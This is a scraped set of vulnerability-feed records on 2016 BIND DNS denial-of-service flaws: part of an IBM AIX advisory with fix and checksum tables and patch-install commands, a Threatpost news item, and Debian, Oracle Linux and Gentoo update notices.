\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n key_fileset = aix\n\n Fileset Lower Level Upper Level KEY \n ---------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs \n bos.net.tcp.server 5.3.12.0 5.3.12.6 key_w_fs\n bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs\n bos.net.tcp.server 6.1.9.0 6.1.9.200 key_w_fs\n bos.net.tcp.client 7.1.3.0 7.1.3.48 key_w_fs\n bos.net.tcp.server 7.1.3.0 7.1.3.48 key_w_fs\n bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs\n bos.net.tcp.server 7.1.4.0 7.1.4.30 key_w_fs\n bos.net.tcp.bind_utils 7.2.0.0 7.2.0.1 key_w_fs\n bos.net.tcp.bind 7.2.0.0 7.2.0.0 key_w_fs\n \n Note: To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ------------------------------------------------\n 5.3.12 IV90056 N/A N/A key_w_apar\n 6.1.9 IV89828 4/28/17 SP9 key_w_apar\n 7.1.3 IV89830 6/30/17 SP9 key_w_apar\n 7.1.4 IV89829 4/28/17 SP4 key_w_apar\n 7.2.0 IV89831 1/27/17 SP3 key_w_apar\n\n VIOS Level APAR Availability Release\n ------------------------------------------\n 2.2.3 IV89828 6/30/17 2.2.3.90\n 2.2.4 IV89828 6/30/17 2.2.4.40\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV90056\n http://www.ibm.com/support/docview.wss?uid=isg1IV89828\n http://www.ibm.com/support/docview.wss?uid=isg1IV89830\n http://www.ibm.com/support/docview.wss?uid=isg1IV89829\n http://www.ibm.com/support/docview.wss?uid=isg1IV89831\n\n https://www.ibm.com/support/docview.wss?uid=isg1IV90056\n https://www.ibm.com/support/docview.wss?uid=isg1IV89828\n https://www.ibm.com/support/docview.wss?uid=isg1IV89830\n https://www.ibm.com/support/docview.wss?uid=isg1IV89829\n https://www.ibm.com/support/docview.wss?uid=isg1IV89831\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available.\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/bind_fix13.tar\n http://aix.software.ibm.com/aix/efixes/security/bind_fix13.tar\n https://aix.software.ibm.com/aix/efixes/security/bind_fix13.tar\n\n The links above are to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n AIX Level Interim Fix (*.Z) KEY\n ----------------------------------------------\n 5.3.12.9 IV90056m9a.161020.epkg.Z key_w_fix\n 6.1.9.5 IV89828m5a.161017.epkg.Z key_w_fix\n 6.1.9.6 IV89828m6a.161013.epkg.Z key_w_fix \n 6.1.9.7 IV89828m7a.161013.epkg.Z key_w_fix\n 7.1.3.5 IV89830m5a.161010.epkg.Z key_w_fix\n 7.1.3.6 IV89830m6d.161012.epkg.Z key_w_fix\n 7.1.3.7 IV89830m7a.161013.epkg.Z key_w_fix\n 7.1.4.0 IV89829m1a.161013.epkg.Z key_w_fix \n 7.1.4.1 IV89829m1a.161013.epkg.Z key_w_fix\n 7.1.4.2 IV89829m2a.161010.epkg.Z key_w_fix\n 7.2.0.0 IV89831m1a.161017.epkg.Z key_w_fix\n 7.2.0.1 IV89831m1a.161017.epkg.Z key_w_fix\n 7.2.0.2 IV89831m2a.161018.epkg.Z key_w_fix\n\n Please note that the above table refers to AIX TL/SP level as\n opposed to fileset level, i.e., 7.1.3.5 is AIX 7100-03-05.\n\n VIOS Level Interim Fix (*.Z) KEY\n -----------------------------------------------\n 2.2.3.70 IV89828m7a.161013.epkg.Z key_w_fix\n 2.2.4.2x IV89828m7a.161013.epkg.Z key_w_fix\n \n The above fixes are cumulative and address previously issued\n AIX BIND security bulletins with respect to SP and TL. \n\n To extract the fixes from the tar file:\n\n tar xvf bind_fix13.tar\n cd bind_fix13 \n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 <filename>\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n d8429569f694cb01028ca64ca7a015429186f68446b56f1270889ae35ec1997f IV89828m5a.161017.epkg.Z key_w_csum\n d30c22257611a99f9b7245afec9ef6aa40059fcc93f26e7dcffa2ab356436db2 IV89828m6a.161013.epkg.Z key_w_csum\n 9e17c96c2130df27da3a78be4d39c6940d824352f20cf0ea43c088bd189a46c0 IV89828m7a.161013.epkg.Z key_w_csum\n e1cf3b152a9aa4e7d5e96f09b71a3b1eca8e70e7f163ca40c758aef0a8002c04 IV89829m1a.161013.epkg.Z key_w_csum\n 838888c98f1c35a023d9f9337d47742abc190dba37ba26a71838ed6ad61ee1d4 IV89829m2a.161010.epkg.Z key_w_csum\n 2bfc5500f33244a26bcf7406b80efdcfc75610db12527b7d8c3292c7d857c134 IV89830m5a.161010.epkg.Z key_w_csum\n e6924e936d92a22a94ce0e3b51945dd135b0423fdbf45bbf6d05305bf6ff2a52 IV89830m6d.161012.epkg.Z key_w_csum\n 33054b9232f5c573dea6f869d2a7228a41764211036f5840adb766b9d3af9177 IV89830m7a.161013.epkg.Z key_w_csum\n d6b966d566e8e2d94e510774c2315ff751559c3f5352d2ba3cdbbec2aa61779f IV89831m1a.161017.epkg.Z key_w_csum\n 083aadd6c370c678818b320c88c6d8fd40d59e95b4f921c287ef6583649892bc IV89831m2a.161018.epkg.Z key_w_csum\n 55d7e325b63512056976f0cc951c7ebaf96b0f4703c5223f869ce42cb7af5d9c IV90056m9a.161020.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n https://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e epkg_name -p # where epkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e epkg_name -X # where epkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\nhttps://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Fri Nov 18 08:19:36 CST 2016\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n\n", "edition": 17, "modified": "2016-11-18T08:19:36", "published": "2016-11-18T08:19:36", "id": "BIND_ADVISORY13.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/bind_advisory13.asc", "title": "Vulnerabilities in BIND impact AIX,Vulnerabilities in BIND impact VIOS", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:41", "bulletinFamily": "info", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "The Internet Systems Consortium patched the BIND domain name system this week, addressing what it calls a critical error condition in the software.\n\nA [security advisory](<https://kb.isc.org/article/AA-01419/74/CVE-2016-2776%3A-Assertion-Failure-in-buffer.c-While-Building-Responses-to-a-Specifically-Constructed-Request.html>) on ISC\u2019s Knowledge Base on Tuesday acknowledges an attacker can exploit the vulnerability remotely and likely for that reason, marks the issue as high severity.\n\nThe issue stems from a defect in the rendering of messages into packets when a nameserver is constructing a response, according to the ISC, which has maintained BIND since 2000.\n\nThe bug affects a handful of versions of the software, including versions 9.0.x to 9.8.x, 9.9.0 to 9.9.9-P2, 9.9.3-S1 to 9.9.9-S3, 9.10.0 to 9.10.4-P2, and 9.11.0a1 to 9.11.0rc1.\n\nIf exploited, the vulnerability can lead to \u201can assertion failure in buffer.c while constructing a response to a query that meets certain criteria,\u201d ISC warns, adding that it can be triggered \u201ceven if the apparent source address isn\u2019t allowed to make queries (i.e. doesn\u2019t match \u2018allow-query\u2019).\u201d\n\nWhile the ISC claims the vulnerability isn\u2019t being exploited in the wild, it\u2019s still cautioning that all servers, assuming they can receive request packets from any source, are vulnerable.\n\nUsers running BIND 9 are being urged to update to either version 9.9.9-P3, version 9.10.4-P3, or version 9.11.0rc3 \u2013 whichever release matches closest to their current version.\n\nBIND is easily the most ubiquitous Domain Name System (DNS) software deployed on the Internet. Despite being so widespread, this is only the seventh vulnerability identified in the software so far this year. Before this, the most recent issue, [which surfaced in July](<https://kb.isc.org/article/AA-01393/74/CVE-2016-2775%3A-A-query-name-which-is-too-long-can-cause-a-segmentation-fault-in-lwresd.html>), revolved around a less pressing error that could have led to a denial of service condition in BIND\u2019s implementation of the lightweight resolver protocol.\n", "modified": "2016-09-29T18:08:23", "published": "2016-09-28T16:29:53", "id": "THREATPOST:D7A38F9093BCFFE3B9F1544BCF241462", "href": "https://threatpost.com/isc-patches-critical-error-condition-in-bind/120940/", "type": "threatpost", "title": "ISC Patches Critical Error Condition in BIND", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:23:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "Package : bind9\nVersion : 1:9.8.4.dfsg.P1-6+nmu2+deb7u11\nCVE ID : CVE-2016-2775 CVE-2016-2776\nDebian Bug : 831796 839010\n\nCVE-2016-2775\n\n lwresd crash with long query name\n Backport of upstream commit 38cc2d14e218e536e0102fa70deef99461354232.\n\nCVE-2016-2776\n\n assertion failure due to unspecified crafted query\n Fix based on 43139-9-9.patch from ISC.\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1:9.8.4.dfsg.P1-6+nmu2+deb7u11.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2016-10-05T17:45:24", "published": "2016-10-05T17:45:24", "id": "DEBIAN:DLA-645-1:784F3", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201610/msg00001.html", "title": "[SECURITY] [DLA 645-1] bind9 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-08-12T01:00:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-2775", "CVE-2016-2776"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3680-1 security@debian.org\nhttps://www.debian.org/security/ Florian Weimer\nSeptember 27, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bind9\nCVE ID : CVE-2016-2775 CVE-2016-2776\nDebian Bug : 831796 839010\n\nTwo vulnerabilities were reported in BIND, a DNS server.\n\nCVE-2016-2775\n\n The lwresd component in BIND (which is not enabled by default)\n could crash while processing an overlong request name. This could\n lead to a denial of service.\n\nCVE-2016-2776\n\n A crafted query could crash the BIND name server daemon, leading\n to a denial of service. All server roles (authoritative,\n recursive and forwarding) in default configurations are are\n affected.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:9.9.5.dfsg-9+deb8u7.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2016-09-27T18:52:39", "published": "2016-09-27T18:52:39", "id": "DEBIAN:DSA-3680-1:5E275", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00260.html", "title": "[SECURITY] [DSA 3680-1] bind9 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-8000", "CVE-2016-8864", "CVE-2016-1285", "CVE-2016-2776"], "description": "[32:9.9.4-38]\n- Fix CVE-2016-8864\n[32:9.9.4-37]\n- Fix CVE-2016-2776\n[32:9.9.4-36]\n- Added automatic interface scan functionality (#1294506)\n- Removed NetworkManager dispatcher script since it is not needed any more (#1294506)\n[32:9.9.4-35]\n- Added GeoIP support (#1220594)\n[32:9.9.4-34]\n- Added support for CAA records (#1306610)\n- Use HTTPS URL instead of FTP for upstream sources (#1319280)\n[32:9.9.4-33]\n- Fix excessive queries caused by DS chasing with stub zones when DNSSEC is not used (#1291185)\n- Fix error in internal test suite (#1259514)\n- Fix named-checkconf call in *-chroot.service files (#1278082)\n- Fix incorrect path in BIND sample configuration and added comment to default configuration (#1247502)\n[32:9.9.4-32]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.9.4-31]\n- Fix CVE-2015-8704\n[32:9.9.4-30]\n- Fix CVE-2015-8000", "edition": 4, "modified": "2016-11-09T00:00:00", "published": "2016-11-09T00:00:00", "id": "ELSA-2016-2615", "href": "http://linux.oracle.com/errata/ELSA-2016-2615.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:26", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "edition": 4, "modified": "2016-09-28T00:00:00", "published": "2016-09-28T00:00:00", "id": "ELSA-2016-1945", "href": "http://linux.oracle.com/errata/ELSA-2016-1945.html", "title": "bind97 security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:09", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "edition": 4, "modified": "2016-09-28T00:00:00", "published": "2016-09-28T00:00:00", "id": "ELSA-2016-1944", "href": "http://linux.oracle.com/errata/ELSA-2016-1944.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2016-2848", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[32:9.7.0-21.P2.8]\n- Fix CVE-2016-2848\n[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "edition": 4, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "ELSA-2016-2094", "href": "http://linux.oracle.com/errata/ELSA-2016-2094.html", "title": "bind97 security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:44", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2015-5477", "CVE-2015-8000", "CVE-2016-2848", "CVE-2015-5722", "CVE-2016-1285", "CVE-2016-2776", "CVE-2014-8500"], "description": "[30:9.3.6-25.P1.10]\n- Fix CVE-2016-2848\n[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "edition": 4, "modified": "2016-10-20T00:00:00", "published": "2016-10-20T00:00:00", "id": "ELSA-2016-2093", "href": "http://linux.oracle.com/errata/ELSA-2016-2093.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "gentoo": [{"lastseen": "2016-10-12T00:53:27", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8704", "CVE-2016-1286", "CVE-2016-2088", "CVE-2016-6170", "CVE-2015-8705", "CVE-2016-2775", "CVE-2016-1285", "CVE-2016-2776"], "edition": 1, "description": "### Background\n\nBIND (Berkeley Internet Name Domain) is a Name Server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in BIND. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could cause a Denial of Service condition through multiple attack vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll BIND users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.10.4_p3\"", "modified": "2016-10-11T00:00:00", "published": "2016-10-11T00:00:00", "id": "GLSA-201610-07", "href": "https://security.gentoo.org/glsa/201610-07", "type": "gentoo", "title": "BIND: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}